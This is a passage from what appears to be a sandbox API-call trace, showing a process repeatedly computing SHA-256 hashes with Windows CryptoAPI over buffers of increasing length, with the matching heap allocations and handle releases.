	[0226.078] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.078] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0226.078] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.078] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b320
	[0226.079] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b320, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b320, pdwDataLen=0x1284a8) returned 1
	[0226.079] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.079] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.079] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.079] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.079] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0226.079] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.079] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b348
	[0226.079] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b348, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b348, pdwDataLen=0x1284a8) returned 1
	[0226.079] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.079] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.079] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.079] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.079] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0226.080] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.080] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b370
	[0226.080] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b370, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b370, pdwDataLen=0x1284a8) returned 1
	[0226.080] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.080] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.080] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.080] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.080] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0226.080] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.080] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b398
	[0226.080] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b398, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b398, pdwDataLen=0x1284a8) returned 1
	[0226.080] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.080] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.080] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.081] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.081] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0226.081] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b3c0
	[0226.081] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b3c0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b3c0, pdwDataLen=0x1284a8) returned 1
	[0226.081] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.081] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.081] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2761c48) returned 1
	[0226.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2761c48
	[0226.081] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.081] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.081] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0226.081] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b3e8
	[0226.081] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b3e8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b3e8, pdwDataLen=0x1284a8) returned 1
	[0226.081] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.081] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.081] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.082] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.082] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0226.082] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.082] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b410
	[0226.082] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b410, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b410, pdwDataLen=0x1284a8) returned 1
	[0226.082] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.082] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.082] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.082] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.082] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0226.082] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.082] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b438
	[0226.082] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b438, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b438, pdwDataLen=0x1284a8) returned 1
	[0226.082] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.082] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.082] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.083] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.083] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0226.083] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.083] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b460
	[0226.083] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b460, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b460, pdwDataLen=0x1284a8) returned 1
	[0226.083] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.083] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.083] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.083] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.083] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0226.083] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.083] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b488
	[0226.083] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b488, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b488, pdwDataLen=0x1284a8) returned 1
	[0226.083] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.083] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.083] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.084] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.084] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0226.084] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b4b0
	[0226.084] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b4b0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b4b0, pdwDataLen=0x1284a8) returned 1
	[0226.084] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.084] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.084] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.084] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.084] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0226.084] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b4d8
	[0226.084] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b4d8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b4d8, pdwDataLen=0x1284a8) returned 1
	[0226.084] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.084] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.084] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.085] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.085] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0226.085] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.085] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b500
	[0226.085] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b500, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b500, pdwDataLen=0x1284a8) returned 1
	[0226.085] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.085] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.085] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.085] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.085] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0226.085] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.085] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b528
	[0226.085] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b528, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b528, pdwDataLen=0x1284a8) returned 1
	[0226.085] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.085] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.085] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.086] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.086] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0226.086] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b550
	[0226.086] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b550, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b550, pdwDataLen=0x1284a8) returned 1
	[0226.086] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.086] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.086] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.086] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.086] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0226.086] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b578
	[0226.086] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b578, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b578, pdwDataLen=0x1284a8) returned 1
	[0226.086] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.086] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.086] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.087] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.087] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0226.087] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b5a0
	[0226.087] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b5a0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b5a0, pdwDataLen=0x1284a8) returned 1
	[0226.087] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.087] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.087] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.087] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.087] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0226.087] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b5c8
	[0226.087] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b5c8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b5c8, pdwDataLen=0x1284a8) returned 1
	[0226.087] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.087] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.088] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.088] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.088] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0226.088] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b5f0
	[0226.088] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b5f0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b5f0, pdwDataLen=0x1284a8) returned 1
	[0226.088] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.088] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.088] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.088] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.088] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0226.088] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b618
	[0226.088] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b618, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b618, pdwDataLen=0x1284a8) returned 1
	[0226.088] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.088] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.088] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.089] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.089] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0226.089] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b640
	[0226.089] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b640, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b640, pdwDataLen=0x1284a8) returned 1
	[0226.089] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.089] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.089] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.089] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.089] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0226.089] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b668
	[0226.089] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b668, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b668, pdwDataLen=0x1284a8) returned 1
	[0226.089] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.089] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.089] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.090] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.090] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0226.090] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b690
	[0226.090] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b690, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b690, pdwDataLen=0x1284a8) returned 1
	[0226.090] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.090] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.090] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.090] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.090] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0226.090] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b6b8
	[0226.090] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b6b8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b6b8, pdwDataLen=0x1284a8) returned 1
	[0226.090] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.090] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.090] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.091] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.091] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0226.091] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b6e0
	[0226.091] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b6e0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b6e0, pdwDataLen=0x1284a8) returned 1
	[0226.091] CryptDestroyHash (hHash=0x22b6ac0) returned 1
